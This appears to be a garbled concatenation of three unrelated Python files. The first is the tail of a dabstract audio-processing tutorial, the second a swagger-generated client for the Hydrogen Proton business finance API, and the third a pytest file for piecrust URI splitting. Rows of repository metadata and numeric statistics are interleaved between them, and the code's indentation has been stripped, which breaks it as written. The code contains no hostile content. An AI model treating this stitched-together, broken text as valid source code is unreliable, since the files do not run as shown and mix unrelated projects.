dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.summary()
# apply processing chain to data
# make sure to provide sampling frequency to dp. Kwargs are always accessible for
# all processing layer. Therefore, you should make sure naming DOES NOT overlap
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time (alternative)
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# create processing chain
# in this example, fs is already set in the processing chain
dp = ProcessingChain()
dp.add(Framing(windowsize=10,stepsize=10,axis=0,fs=1))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.summary()
# apply processing chain to data
output_data = dp(data)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time and fit this to normalization
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# create processing chain
dp = ProcessingChain()
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.add(Normalizer(type='standard'))
dp.summary()
# fit processing chain as Normalizer contains a 'fit' method to init parameters
dp.fit(DATA, fs=1)
# apply processing chain to data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Same as before but the data is loaded from wav file
### As a consequence no extra fs information needs to be provided for processing. This read from the wav.
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# define processing chain
dp = ProcessingChain()
dp.add(WavDatareader())
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.add(Normalizer(type='standard'))
dp.summary()
# fit to wavfiles
dp.fit(wavfiles) #fit from wav files
#dp.fit(['data_intro/data_numpy/0.wav', 'data_intro/data_numpy/1.wav', 'data_intro/data_numpy/3.wav', ...], fs=1)
output_data = dp(wavfiles[2]) # process from wavfiles
#output_data = dp('data_intro/data_numpy/2.wav',fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Same as before but the data is loaded from numpy file \
### As a consequence extra fs information needs to be provided for processing.
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# define processing chain
dp = ProcessingChain()
dp.add(NumpyDatareader())
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.add(Normalizer(type='standard'))
# fit to numpy files
dp.fit(numpyfiles, fs=1) #fit from npy files
#dp.fit(['data_intro/data_numpy/0.npy', 'data_intro/data_numpy/1.npy', 'data_intro/data_numpy/3.npy', ...], fs=1)
output_data = dp(numpyfiles[2],fs=1) #fit from npy files
#output_data = dp('data_intro/data_numpy/2.npy',fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time and fit this to normalization (created from hardcoded configuration)
from dabstract.dataprocessor import ProcessingChain
config = {'chain': [{'name': 'NumpyDatareader'},
{'name': 'Framing',
'parameters': {'axis': 0, 'stepsize': 10, 'windowsize': 10}},
{'name': 'FFT',
'parameters': {'axis': 1}},
{'name': 'Logarithm'},
{'name': 'Aggregation',
'parameters': {'axis': 0,
'combine': 'concatenate',
'methods': ['mean', 'std']}},
{'name': 'Normalizer',
'parameters': {'type': 'standard'}}]}
dp = ProcessingChain(config)
dp.summary()
# OR
# dp = ProcessingChain()
# dp.add(config)
dp.fit(numpyfiles, fs=1) #fit from npy files
#dp.fit(['data_intro/data_numpy/0.npy', 'data_intro/data_numpy/1.npy', 'data_intro/data_numpy/3.npy', ...], fs=1)
output_data = dp(numpyfiles[2],fs=1) #fit from npy files
#output_data = dp('data_intro/data_numpy/2.npy',fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time and fit this to normalization (created from yaml config)
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration
config = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'))
# create processing chain from the yaml config
dp = ProcessingChain(config)
# fit data
dp.fit(DATA, fs=1)
# process
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Same as before, but now the yaml loading fct and feed to ProcessingChain() is available in a one-liner.
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# fit data
dp.fit(DATA, fs=1)
# process
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to add a custom processing layer
# -- processing chain from config BIS
from dabstract.dataprocessor import ProcessingChain, Processor
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# custom processor.
# This is a minimal example of what a processor can do.
class custom_processor(Processor):
def process(self, data, **kwargs):
return data * 100, {}
# return data, information that can be propagated to consecutive layers
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
dp.summary()
# add a custom processor to the dp.chain
dp.add(custom_processor())
dp.summary()
# Fit data to chain
dp.fit(DATA, fs=1)
# process0
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to add a custom processing with fit option
# -- processing chain from config BIS
from dabstract.dataprocessor import ProcessingChain, Processor
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# custom processor.
# This is a minimal example of what a processor can do.
class custom_processor(Processor):
def process(self, data, **kwargs):
return (data - self.mean) * 100, {}
# return data, information that can be propagated to consecutive layers
def fit(self, data, info, **kwargs):
self.mean = np.mean(data)
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
dp.summary()
# add custom processor
dp.add(custom_processor())
dp.summary()
# fit data (it's recursive, so both the normalizer and the custom_processor are fit'ed on the data)
dp.fit(DATA, fs=1)
# process data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to use any function in a dabstract processing chain and still use info propagation
# -- processing chain from config BIS
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
def custom_fct(data,**kwargs):
return (data - 5) * 100
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
dp.summary()
# add custom processors
dp.add(custom_fct)
dp.add(lambda x: x*100)
dp.summary()
# fit data (it's recursive, so both the normalizer and the custom_processor are fit'ed on the data)
dp.fit(DATA, fs=1)
# process data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to add a custom processing layer within configuration using !class
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config_custom', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# fit data (it's recursive, so both the normalizer and the custom_processor are fit'ed on the data)
dp.fit(DATA, fs=1)
# process data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create a lazy data source from disk with additional processing
### Adds a lazy mapping function to DATA and allow multi-example indexing
# -- processing chain for multiple examples
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
from dabstract.abstract.abstract import MapAbstract, DataAbstract
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# Fit data
dp.fit(DATA, fs=1)
# Make and abstract data source
# you can now access data as with typical indexing
# e.g. datab[0], data[1]
# in this way it accesses DATA[0] and DATA[1] respectively with the additional dp
datab = MapAbstract(DATA,dp, fs=1)
print(datab)
# allow for multi indexing, e.g. data[:] or data[0,1]
datab = DataAbstract(datab, fs=1)
print(datab)
print('\n\n\n')
# -------------------------------------------------------------------------
### Add multi-processing to lazy data source
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# Fit data
dp.fit(DATA, fs=1)
# Make and abstract data source
# you can now access data as with typical indexing
# e.g. datab[0], data[1]
# in this way it accesses DATA[0] and DATA[1] respectively with the additional dp
datab = MapAbstract(DATA,dp, fs = 1)
print(datab)
# allow for multi indexing, e.g. data[:] or data[0,1]
# and allow for multiprocessing with the workers and buffer_len flag
# indexing is paralellized, but also the iterator is
datab = DataAbstract(datab, workers=2, buffer_len=2)
print(datab)
for k,d in enumerate(datab):
print('Example ' + str(k))
print(d)
| 39.8375
| 123
| 0.677832
| 1,747
| 12,748
| 4.870063
| 0.126503
| 0.055007
| 0.082511
| 0.052656
| 0.776681
| 0.746121
| 0.746121
| 0.746121
| 0.732487
| 0.712858
| 0
| 0.012342
| 0.129275
| 12,748
| 319
| 124
| 39.962382
| 0.754144
| 0.430499
| 0
| 0.736264
| 1
| 0
| 0.092264
| 0.003516
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021978
| false
| 0
| 0.214286
| 0.016484
| 0.263736
| 0.17033
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e81dd64ef4d274a0c0e5f2f3b5bf7934ecb70dc7
| 23,019
|
py
|
Python
|
atom/proton/python/proton_api/api/business_financial_management_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | 11
|
2019-04-16T02:11:17.000Z
|
2021-12-16T22:51:40.000Z
|
atom/proton/python/proton_api/api/business_financial_management_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | 81
|
2019-11-19T23:24:28.000Z
|
2022-03-28T11:35:47.000Z
|
atom/proton/python/proton_api/api/business_financial_management_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | 11
|
2020-07-08T02:29:56.000Z
|
2022-03-28T10:05:33.000Z
|
# coding: utf-8
"""
Hydrogen Proton API
Financial engineering module of Hydrogen Atom # noqa: E501
OpenAPI spec version: 1.9.2
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from proton_api.api_client import ApiClient
class BusinessFinancialManagementApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def business_financial_health_check(self, business_financial_health_check_request, **kwargs): # noqa: E501
"""Business Financial Health Check # noqa: E501
Calculate a series of financial ratios to assess business financial health # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.business_financial_health_check(business_financial_health_check_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BusinessFinancialHealthCheckRequest business_financial_health_check_request: Request payload for Business Financial Health Check (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.business_financial_health_check_with_http_info(business_financial_health_check_request, **kwargs) # noqa: E501
else:
(data) = self.business_financial_health_check_with_http_info(business_financial_health_check_request, **kwargs) # noqa: E501
return data
def business_financial_health_check_with_http_info(self, business_financial_health_check_request, **kwargs): # noqa: E501
"""Business Financial Health Check # noqa: E501
Calculate a series of financial ratios to assess business financial health # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.business_financial_health_check_with_http_info(business_financial_health_check_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BusinessFinancialHealthCheckRequest business_financial_health_check_request: Request payload for Business Financial Health Check (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['business_financial_health_check_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method business_financial_health_check" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'business_financial_health_check_request' is set
if self.api_client.client_side_validation and ('business_financial_health_check_request' not in params or
params['business_financial_health_check_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `business_financial_health_check_request` when calling `business_financial_health_check`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'business_financial_health_check_request' in params:
body_params = params['business_financial_health_check_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/business/financial_health_check', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def cash_analysis(self, cash_analysis_request, **kwargs): # noqa: E501
"""Cash Analysis # noqa: E501
Analyze cash activity over time # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cash_analysis(cash_analysis_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CashAnalysisRequest cash_analysis_request: Request payload for Cash Analysis (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.cash_analysis_with_http_info(cash_analysis_request, **kwargs) # noqa: E501
else:
(data) = self.cash_analysis_with_http_info(cash_analysis_request, **kwargs) # noqa: E501
return data
def cash_analysis_with_http_info(self, cash_analysis_request, **kwargs): # noqa: E501
"""Cash Analysis # noqa: E501
Analyze cash activity over time # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cash_analysis_with_http_info(cash_analysis_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CashAnalysisRequest cash_analysis_request: Request payload for Cash Analysis (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cash_analysis_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method cash_analysis" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cash_analysis_request' is set
if self.api_client.client_side_validation and ('cash_analysis_request' not in params or
params['cash_analysis_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `cash_analysis_request` when calling `cash_analysis`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cash_analysis_request' in params:
body_params = params['cash_analysis_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/business/cash_analysis', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def customer_analysis(self, customer_analysis_request, **kwargs): # noqa: E501
"""Customer Analysis # noqa: E501
Analyze customer revenues over a time period # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.customer_analysis(customer_analysis_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CustomerAnalysisRequest customer_analysis_request: Request payload for Customer Analysis (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.customer_analysis_with_http_info(customer_analysis_request, **kwargs) # noqa: E501
else:
(data) = self.customer_analysis_with_http_info(customer_analysis_request, **kwargs) # noqa: E501
return data
def customer_analysis_with_http_info(self, customer_analysis_request, **kwargs): # noqa: E501
"""Customer Analysis # noqa: E501
Analyze customer revenues over a time period # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.customer_analysis_with_http_info(customer_analysis_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CustomerAnalysisRequest customer_analysis_request: Request payload for Customer Analysis (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer_analysis_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method customer_analysis" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_analysis_request' is set
if self.api_client.client_side_validation and ('customer_analysis_request' not in params or
params['customer_analysis_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `customer_analysis_request` when calling `customer_analysis`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'customer_analysis_request' in params:
body_params = params['customer_analysis_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/business/customer_analysis', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def financial_statement_analysis(self, financial_statement_analysis_request, **kwargs): # noqa: E501
"""Financial Statement Analysis # noqa: E501
Analyze financial statement accounting data for a business # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.financial_statement_analysis(financial_statement_analysis_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param FinancialStatementAnalysisRequest financial_statement_analysis_request: Request payload for Financial Statement Analysis (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.financial_statement_analysis_with_http_info(financial_statement_analysis_request, **kwargs) # noqa: E501
else:
(data) = self.financial_statement_analysis_with_http_info(financial_statement_analysis_request, **kwargs) # noqa: E501
return data
def financial_statement_analysis_with_http_info(self, financial_statement_analysis_request, **kwargs): # noqa: E501
"""Financial Statement Analysis # noqa: E501
Analyze financial statement accounting data for a business # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.financial_statement_analysis_with_http_info(financial_statement_analysis_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param FinancialStatementAnalysisRequest financial_statement_analysis_request: Request payload for Financial Statement Analysis (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['financial_statement_analysis_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method financial_statement_analysis" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'financial_statement_analysis_request' is set
if self.api_client.client_side_validation and ('financial_statement_analysis_request' not in params or
params['financial_statement_analysis_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `financial_statement_analysis_request` when calling `financial_statement_analysis`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'financial_statement_analysis_request' in params:
body_params = params['financial_statement_analysis_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/business/financial_statement_analysis', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def invoice_analysis(self, invoice_analysis_request, **kwargs): # noqa: E501
"""Invoice Analysis # noqa: E501
Analyze invoices to understand the context of money owed and paid to a business # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.invoice_analysis(invoice_analysis_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BusinessInvoiceAnalysisRequest invoice_analysis_request: Request payload for Invoice Analysis (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.invoice_analysis_with_http_info(invoice_analysis_request, **kwargs) # noqa: E501
else:
(data) = self.invoice_analysis_with_http_info(invoice_analysis_request, **kwargs) # noqa: E501
return data
def invoice_analysis_with_http_info(self, invoice_analysis_request, **kwargs): # noqa: E501
"""Invoice Analysis # noqa: E501
Analyze invoices to understand the context of money owed and paid to a business # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.invoice_analysis_with_http_info(invoice_analysis_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BusinessInvoiceAnalysisRequest invoice_analysis_request: Request payload for Invoice Analysis (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['invoice_analysis_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method invoice_analysis" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'invoice_analysis_request' is set
if self.api_client.client_side_validation and ('invoice_analysis_request' not in params or
params['invoice_analysis_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `invoice_analysis_request` when calling `invoice_analysis`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'invoice_analysis_request' in params:
body_params = params['invoice_analysis_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/business/invoice_analysis', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 43.432075
| 165
| 0.645206
| 2,560
| 23,019
| 5.509766
| 0.071094
| 0.045941
| 0.048919
| 0.055583
| 0.940021
| 0.922368
| 0.901808
| 0.867777
| 0.854803
| 0.854803
| 0
| 0.015408
| 0.275381
| 23,019
| 529
| 166
| 43.514178
| 0.830216
| 0.341674
| 0
| 0.734767
| 1
| 0
| 0.209499
| 0.104927
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039427
| false
| 0
| 0.014337
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e835d8aec98b25751b00916688f43a9e7f3821aa
| 2,813
|
py
|
Python
|
tests/test_uriutil.py
|
airbornemint/PieCrust2
|
bd8e44a1a3ba646a9ebfbb4d4f1fa01a1daa3beb
|
[
"Apache-2.0"
] | 43
|
2015-04-24T05:30:04.000Z
|
2022-02-03T17:47:35.000Z
|
tests/test_uriutil.py
|
airbornemint/PieCrust2
|
bd8e44a1a3ba646a9ebfbb4d4f1fa01a1daa3beb
|
[
"Apache-2.0"
] | 54
|
2015-01-03T01:58:44.000Z
|
2021-05-06T21:56:26.000Z
|
tests/test_uriutil.py
|
airbornemint/PieCrust2
|
bd8e44a1a3ba646a9ebfbb4d4f1fa01a1daa3beb
|
[
"Apache-2.0"
] | 8
|
2015-05-10T01:50:46.000Z
|
2016-12-26T20:53:15.000Z
|
import mock
import pytest
from piecrust.uriutil import split_sub_uri
@pytest.mark.parametrize('uri, expected, pretty_urls', [
('/', ('/', 1), True),
('/2', ('/', 2), True),
('/foo/bar', ('/foo/bar', 1), True),
('/foo/bar/', ('/foo/bar', 1), True),
('/foo/bar/2/', ('/foo/bar', 2), True),
('/foo/bar.ext', ('/foo/bar.ext', 1), True),
('/foo/bar.ext/2', ('/foo/bar.ext', 2), True),
('/', ('/', 1), False),
('/2.html', ('/', 2), False),
('/foo/bar.html', ('/foo/bar.html', 1), False),
('/foo/bar/2.html', ('/foo/bar.html', 2), False),
('/foo/bar.ext', ('/foo/bar.ext', 1), False),
('/foo/bar/2.ext', ('/foo/bar.ext', 2), False)
])
def test_split_sub_uri(uri, expected, pretty_urls):
app = mock.MagicMock()
app.config = {
'site/root': '/',
'site/pretty_urls': pretty_urls,
'__cache/pagination_suffix_re': '/(?P<num>\\d+)$'}
actual = split_sub_uri(app, uri)
assert actual == (expected[0], expected[1])
@pytest.mark.parametrize('uri, expected, pretty_urls', [
('/', ('/', 1), True),
('/2/', ('/', 2), True),
('/foo/bar', ('/foo/bar/', 1), True),
('/foo/bar/', ('/foo/bar/', 1), True),
('/foo/bar/2', ('/foo/bar/', 2), True),
('/foo/bar/2/', ('/foo/bar/', 2), True),
('/foo/bar.ext/', ('/foo/bar.ext/', 1), True),
('/foo/bar.ext/2/', ('/foo/bar.ext/', 2), True),
])
def test_split_sub_uri_trailing_slash(uri, expected, pretty_urls):
app = mock.MagicMock()
app.config = {
'site/root': '/',
'site/pretty_urls': pretty_urls,
'site/trailing_slash': True,
'__cache/pagination_suffix_re': '/(?P<num>\\d+)$'}
actual = split_sub_uri(app, uri)
assert actual == (expected[0], expected[1])
@pytest.mark.parametrize('uri, expected, pretty_urls', [
('/', ('/', 1), True),
('/2', ('/', 2), True),
('/foo/bar', ('/foo/bar', 1), True),
('/foo/bar/', ('/foo/bar', 1), True),
('/foo/bar/2', ('/foo/bar', 2), True),
('/foo/bar/2/', ('/foo/bar', 2), True),
('/foo/bar.ext', ('/foo/bar.ext', 1), True),
('/foo/bar.ext/2', ('/foo/bar.ext', 2), True),
('/', ('/', 1), False),
('/2.html', ('/', 2), False),
('/foo/bar.html', ('/foo/bar.html', 1), False),
('/foo/bar/2.html', ('/foo/bar.html', 2), False),
('/foo/bar.ext', ('/foo/bar.ext', 1), False),
('/foo/bar/2.ext', ('/foo/bar.ext', 2), False)
])
def test_split_sub_uri_with_root(uri, expected, pretty_urls):
app = mock.MagicMock()
app.config = {
'site/root': '/whatever/',
'site/pretty_urls': pretty_urls,
'__cache/pagination_suffix_re': '/(?P<num>\\d+)$'}
actual = split_sub_uri(app, '/whatever' + uri)
assert actual == ('/whatever' + expected[0], expected[1])
| 36.532468
| 66
| 0.50871
| 380
| 2,813
| 3.644737
| 0.113158
| 0.216607
| 0.116968
| 0.07148
| 0.886643
| 0.873646
| 0.873646
| 0.873646
| 0.873646
| 0.873646
| 0
| 0.02587
| 0.202986
| 2,813
| 76
| 67
| 37.013158
